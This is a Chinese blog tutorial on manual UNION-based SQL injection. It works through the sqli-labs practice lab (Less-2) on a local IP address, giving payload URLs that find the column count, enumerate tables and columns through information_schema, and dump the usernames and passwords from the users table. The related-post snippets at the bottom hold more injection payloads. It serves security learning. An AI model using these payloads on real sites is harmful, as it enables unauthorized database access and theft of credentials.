SQL注入语句

最新推荐文章于 2024-01-26 21:55:16 发布
最新推荐文章于 2024-01-26 21:55:16 发布
阅读量297 收藏 1
点赞数
文章标签: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44656678/article/details/100607144
版权

对于SQL语句注入来说
最重要的是利用其系统已存在的一个information.Schema
其中schemata是用来查询库名称
Tables用来查询表名称
Columns用来查询列名称
Order by语句用来判断当前库的列数
Select用来查询库中的信息
关于SQL注入的相关流程
1.首先判断注入语句变量的闭合类型,例如?Id=1’或者?Id=$id或者id=1”等等闭合类型,保证输入以后的URL可以显示正常界面
例如192.168.66.129/sqli-labs-master/Less-2/?id =1 and 1=2 --+(判断闭合类型语句)

其中–+表示#通过URL转码的原始代码
union all联合查询语句,作用联合查询多张表 (利用此语句进行后台SQL写入)
http://192.168.225.129/sqli-labs-master/Less-2/?id=1 and 1=2 --+
在这里插入图片描述

闭合方式正确 id =1
2.查询当前一共有多少列
http://192.168.225.129/sqli-labs-master/Less-2/?id=1 order by 4–+

说明他的列数小于4

http://192.168.225.129/sqli-labs-master/Less-2/?id=1 order by 3–+
在这里插入图片描述
说明列数等于3
3.写入select语句取用信息
http://192.168.225.129/sqli-labs-master/Less-2/?id=-1 union all select 1,database(),3–+
在这里插入图片描述
说明库名为security;

4.由库名得到表名:
http://192.168.225.129/sqli-labs-master/Less-2/?id=-1 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+

在这里插入图片描述
5.在表中得到有用信息查询users
http://192.168.225.129/sqli-labs-master/Less-2/?id=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users” and table_schema= “security”–+
在这里插入图片描述
6.输出获取到的用户名和密码:
http://192.168.225.129/sqli-labs-master/Less-2/?id=-1 union all select 1,group_concat(username),group_concat(password) from users–+

在这里插入图片描述

伪程序猿丶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入语句和方法总结
叮当大猫猫
09-29 6650
一、SQL语法基础 SQL语法基础和Oracle注入技巧 https://pan.baidu.com/s/11EOTJ8nHrHqimF8nJJTDvA 提取码:4zep 二、SQL手工注入语句 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)&gt
sql注入详解
m0_67392811的博客
06-12 5805
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
常用sql注入语句
hey
08-19 1万+
首先,看看SQL注入攻击能分为以下三种类型: Inband:数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上; Out-of-band:数据通过不同于SQL代码注入的方法获得(譬如通过邮件等) 推理:这种攻击时说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。 不论是...
sql注入基础
weixin_52657559的博客
10-27 1516
sql注入
手工SQL注入流程与常用语句
最新发布
LCW991207的博客
01-26 1536
如下代码和截图所示,展示了获取数据库中表的信息,information_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。在这一步中,尝试去猜测出查询语句中的字段个数,如下注入语句所示,假设为字符型注入,先利用1’实现引号闭环,再利用or 1=1这样可以暴露出表中所有的数据,最后利用order by num#去看是否报错来明确查询语句中的字段数,其中#号用于截断sql查询语句。查flag表记录的数量。
sql注入语句sql注入语句sql注入语句
01-04
sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句...
sql注入语句.txt
12-01
基本的sql注入语法,大部分存在sql注入都可以使用以上代码来尝试 查询表名 and 1=2 union select 1,table一name from information—scherna.tables where table_schema=database() limit 1,1 and 1=2 union select ...
DB2数据库SQL注入语句
02-17
本文将深入探讨DB2数据库中的SQL注入语句,以及如何通过这些语句来猜解数据库结构和数据。 首先,SQL注入的基础原理是通过在合法的SQL查询语句中嵌入恶意代码,以改变原本的查询逻辑。在给定的示例中,攻击者试图猜...
常用Sql注入语句 常用Sql注入语句
09-28
常用Sql注入语句 了解 SQL 注入攻击的类型: 1. Inband:数据经由 SQL 代码注入的通道取出,这是最直接的一种攻击,通过 SQL 注入获取的信息直接反映到应用程序的 Web 页面上。 2. Out-of-band:数据通过不同于 ...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
常见sql注入语句和xss注入语句
小白博客
12-22 2864
1 and 1=1 或者1' and '1'='1 判断注入的类型 1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...
SQL注入(MySQL查询语句、URL编码、无回显)
Hardworking666的博客
01-05 1939
文章目录MySQL常用查询语句注释URL编码 MySQL常用查询语句 select user(); 当前MySQL 登录用户名 select database(); 当前MySQL 数据库名 select version(); 当前MySQL 版本 select @@version; 当前MySQL 版本 select @@basedir; 当前MySQL 安装路径(MySQL安装目录) select(length..
网络安全风险感知和发掘,练习题
热门推荐
g5703129的博客
03-28 2万+
一、单项选择题 1. BurpSuite插件支持哪两种编程语言?() A.C#、Java B.Java、Python C.Ruby、Perl D.PHP、Java 2. HTTP请求中,设置()请求方法可获取服务器的应用服务信息。 A.Head B.Trace C.POST D.OPTIONS 3. UNIX系统中用户的有效用户组是() A.运行时是不可变 B.任意...
血腥!实况转播SQL注入全过程,让你知道危害有多大。
weixin_30532973的博客
03-31 948
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就实况转播,来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根...
常用sql语句
baidu_33570760的博客
05-04 283
转载自:http://blog.csdn.net/luoweifu/article/details/8831536 一、基础 1、说明:创建数据库(oracle) [sql] view plain copy    [sql] view plain copy CREATE DATABASE database-name
标准SQL注入语句
tangfengray的专栏
07-28 482
1.判断有无注入点  ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等..  and 0 and 0 3.猜帐号数目 如果遇到0 and 0 and 1 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.  and 1=(select count(*) from
sql 注入的基本语句 种类 分类 流程
weixin_44286136的博客
05-20 189
sql注入是什么? SQL注入攻击是利用网站程序漏洞,通过提交恶意构造的SQL语句,以达到窃 取、修改、破坏数据库为目的的攻击。 可以用来注入的地址,比如说某个请求会发送某个参数,而这个参数在后台用于作为数据库查询的拼接字段,且未完全过滤,那么这个点就有可能是一个注入点 注入点类型来分类 数字型注入点 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 1)加单引号,URL:http://xxx.xx:xxxx/new_list.php?id=1’ 对应的sql:select * from t
sql注入语句实例大全
04-30
以下是一些常见的SQL注入语句实例: 1. SELECT * FROM users WHERE username = 'admin' AND password = '123456' OR 1=1'; 这个语句的意思是在查询用户时,如果用户名是admin,且密码为123456,则登录成功;否则,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值